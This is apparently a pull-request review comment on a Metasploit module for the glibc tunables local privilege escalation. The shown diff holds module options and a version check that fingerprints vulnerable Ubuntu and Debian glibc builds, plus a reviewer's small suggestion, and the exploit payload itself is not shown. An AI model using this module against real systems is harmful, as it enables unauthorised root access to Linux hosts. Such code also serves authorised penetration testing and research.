modules/exploits/linux/local/glibc_tunables_priv_esc.rb

```diff
@@ -0,0 +1,175 @@
+          'PrependSetresuid' => true,
+          'WfsDelay' => 600
+        },
+        'DisclosureDate' => '2023-10-03',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )
+    register_advanced_options([
+      OptString.new('WritableDir', [ true, 'A directory where you can write files.', '/tmp' ])
+    ])
+  end
+
+  def find_exec_program
+    %w[python python3].select(&method(:command_exists?)).first
+  rescue StandardError => e
+    fail_with(Failure::Unknown, "An error occurred finding a version of python to use: #{e.message}")
+  end
+
+  def check
+    glibc_version = cmd_exec('ldd --version')&.scan(/ldd\s+\(\w+\s+GLIBC\s+(\S+)\)/)&.flatten&.first
+    return CheckCode::Unknown('Could not get the version of glibc') unless glibc_version
+
+    sysinfo = get_sysinfo
+    case sysinfo[:distro]
+    when 'ubuntu'
+      # Ubuntu's version looks like: 2.35-0ubuntu3.4. The following massaging is necessary for Rex::Version compatibility
+      test_version = glibc_version.gsub(/-\d+ubuntu/, '.')
+      if Rex::Version.new(test_version).between?(Rex::Version.new('2.35'), Rex::Version.new('2.35.3.4')) ||
+         Rex::Version.new(test_version).between?(Rex::Version.new('2.37'), Rex::Version.new('2.37.2.1')) ||
+         Rex::Version.new(test_version).between?(Rex::Version.new('2.38'), Rex::Version.new('2.38.6'))
+        return CheckCode::Appears("The glibc version (#{glibc_version}) found on the target appears to be vulnerable")
+      end
+    when 'debian'
+      # Debian's version looks like: 2.36-9+deb12u1. The following massaging is necessary for Rex::Version compatibility
+      test_version = glibc_version.gsub(/\+deb/, '.').gsub(/u/, '.').gsub('-', '.')
+      if Rex::Version.new(test_version).between?(Rex::Version.new('2.31'), Rex::Version.new('2.31.13.11.7')) ||
+         Rex::Version.new(test_version).between?(Rex::Version.new('2.36'), Rex::Version.new('2.36.9.12.3'))
+        return CheckCode::Appears("The glibc version (#{glibc_version}) found on the target appears to be vulnerable")
+      end
+    else
+      return CheckCode::Unknown('The module has not been tested against this Linux distribution')
+    end
+    CheckCode::Safe("The glibc version (#{glibc_version}) found on the target does not appear to be vulnerable")
+  end
+
+  def check_ld_so_build_id
+    # Check to ensure the python exploit has the magic offset defined for the BuildID for ld.so
+    if command_exists?('file ')
+      file_cmd_output = ''
+
+      # This needs to be split up by distro as Ubuntu has readlink and which installed by default but "ld.so" is not
+      # defined on the path like it is on Debian. Also Ubuntu doesn't have ldconfig install by default.
+      sysinfo = get_sysinfo
+      case sysinfo[:distro]
+      when 'ubuntu'
+        if command_exists?('ldconfig') && command_exists?('grep')
```

Comment:
```suggestion
        if command_exists?('ldconfig')
```

`grep` can't be removed from Ubuntu